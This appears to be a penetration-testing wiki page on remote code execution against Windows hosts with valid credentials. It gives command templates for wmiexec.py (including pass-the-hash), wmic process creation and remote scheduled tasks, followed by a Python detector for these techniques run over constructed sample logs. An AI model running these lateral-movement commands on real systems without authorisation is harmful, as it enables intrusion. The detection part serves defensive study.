Authenticated RCE

Remote code execution on a Windows target using legitimate credentials:


The content below should be moved to its dedicated section:

Automated Tools

wmiexec.py

Executes a command or a semi-interactive shell using Windows Management Instrumentation (WMI).

wmiexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]

Tip

Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique.

Manual Process

WMIC
wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command]

If you leave off the /user and /password, it will pass through the existing user’s credentials (see SMB Sessions).

Tip

Replace [targetIP] with @[filename] to run [command] on every IP listed in the file.

schtasks and at

This process schedules a task on the remote target (through its Task Scheduler service) that runs a command in the very near future.

1. Establish an SMB session:

net use \\[targetIP] /u:[admin_user]

2. Verify that the Schedule service is running and start it if not:

sc \\[targetIP] query schedule
sc \\[targetIP] start schedule

3. Check the current local time on the target machine:

net time \\[targetIP]

4. Schedule the job:

at \\[targetIP] [HH:MM] [A|P] [command]
schtasks /create /tn [taskname] /s [targetIP] /u [user] /p [password] /sc [frequency] /st [HH:MM:SS] /sd [startdate] /tr [command]

5. Verify the job status:

at \\[targetIP]
schtasks /query /s [targetIP]
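Detection-side counterpart to the WMI and scheduled-task techniques above, as an added example that is not part of the original page: a small Python checker run over constructed Sysmon-style process-creation records (JSON lines with hypothetical field names) that flags shells spawned by WmiPrvSE.exe (wmic process call create, wmiexec.py), the ADMIN$ output file wmiexec.py redirects to, and schtasks/at invocations aimed at a remote host.

```python
import json
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (Sysmon Event ID 1 style fields, one JSON
# object per line). Field names and values are assumptions, not real data.
SAMPLE_EVENTS = r"""
{"host":"WS01","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","CommandLine":"cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.12 2>&1","User":"CORP\\admin"}
{"host":"WS01","Image":"C:\\Windows\\System32\\schtasks.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"schtasks /create /tn upd /s 10.0.0.5 /u corp\\admin /p x /sc once /st 10:00:00 /tr calc.exe","User":"CORP\\admin"}
{"host":"WS02","Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe","User":"CORP\\alice"}
"""

SHELLS = {"cmd.exe", "powershell.exe"}
# wmiexec.py names its output file in the ADMIN$ share "__<timestamp>".
WMIEXEC_REDIRECT_RE = re.compile(r"ADMIN\$\\__\d+")
# schtasks "/s <host>" or at "\\<host>" point the tool at a remote machine.
REMOTE_TASK_RE = re.compile(r"(?i)\s/s\s+\S+|\s\\\\\S+")


def basename(path):
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the names of the lateral-movement rules this event matches."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    # wmic process call create and wmiexec.py both start the remote process
    # from the WMI provider host, so the shell's parent is WmiPrvSE.exe.
    if parent == "wmiprvse.exe" and image in SHELLS:
        hits.append("wmi_spawned_shell")
    if WMIEXEC_REDIRECT_RE.search(cmdline):
        hits.append("wmiexec_output_file")
    if image in {"schtasks.exe", "at.exe"} and REMOTE_TASK_RE.search(cmdline):
        hits.append("remote_task_creation")
    return hits


def analyze(jsonl):
    """Run every rule over each record; return (host, user, rule) alerts."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        for rule in classify(event):
            alerts.append((event["host"], event["User"], rule))
    return alerts
```

Pair the process-creation rules with Windows Security event 4698 (scheduled task created) on the target side to see the task itself, not only the tool that created it.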